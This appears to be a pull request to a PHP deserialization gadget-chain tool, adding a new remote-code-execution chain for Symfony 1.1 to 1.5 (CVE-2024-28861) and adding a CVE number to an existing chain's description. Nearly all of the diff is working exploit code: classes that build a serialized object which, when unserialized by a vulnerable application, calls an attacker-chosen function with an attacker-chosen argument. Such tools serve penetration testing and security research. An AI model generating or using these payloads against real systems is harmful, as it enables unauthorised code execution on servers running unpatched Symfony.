### PR TITLE
Adding another Symfony 1.1 to 1.5 RCE gadget chain (CVE-2024-28861)

### DIFF
--- a/gadgetchains/Symfony/RCE/12/chain.php
+++ b/gadgetchains/Symfony/RCE/12/chain.php
@@ -7,7 +7,7 @@ class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
     public static $version = '1.3.0 <= 1.5.13~17';
     public static $vector = '__destruct';
     public static $author = 'darkpills';
-    public static $information = 'Works until 1.5.13, and until 1.5.17 if installed via git method (not composer)';
+    public static $information = 'Works until 1.5.13, and until 1.5.17 if installed via git method, not composer (CVE-2024-28859)';
 
     public function generate(array $parameters)
     {

--- a/gadgetchains/Symfony/RCE/16/chain.php
+++ b/gadgetchains/Symfony/RCE/16/chain.php
@@ -1,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE16 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.1.0 <= 1.5.18';
+    public static $vector = 'Serializable';
+    public static $author = 'darkpills';
+    public static $information = 'CVE-2024-28861';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
+
+        $tableInfo = new \sfNamespacedParameterHolder($escaper);
+        
+        return $tableInfo;
+    }
+}

--- a/gadgetchains/Symfony/RCE/16/gadgets.php
+++ b/gadgetchains/Symfony/RCE/16/gadgets.php
@@ -1,0 +1,32 @@
+<?php
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class sfNamespacedParameterHolder implements Serializable 
+{
+    protected $prop = null;
+
+    public function __construct($prop) {
+      $this->prop = $prop;
+    }
+
+    public function serialize()
+    {
+        return serialize($this->prop);
+    }
+
+    public function unserialize($serialized)
+    {
+        
+    }
+}


### PR DESCRIPTION
Adding another Symfony RCE gadget chain (CVE-2024-28861). This one is more powerful, since it covers all versions from 1.1 to 1.5, with no breaking changes.
A release of Symfony 1.5 has been done today (1.5.19) with the fix.

Also added the CVE number for the previous Symfony/RCE/12 chain in the information.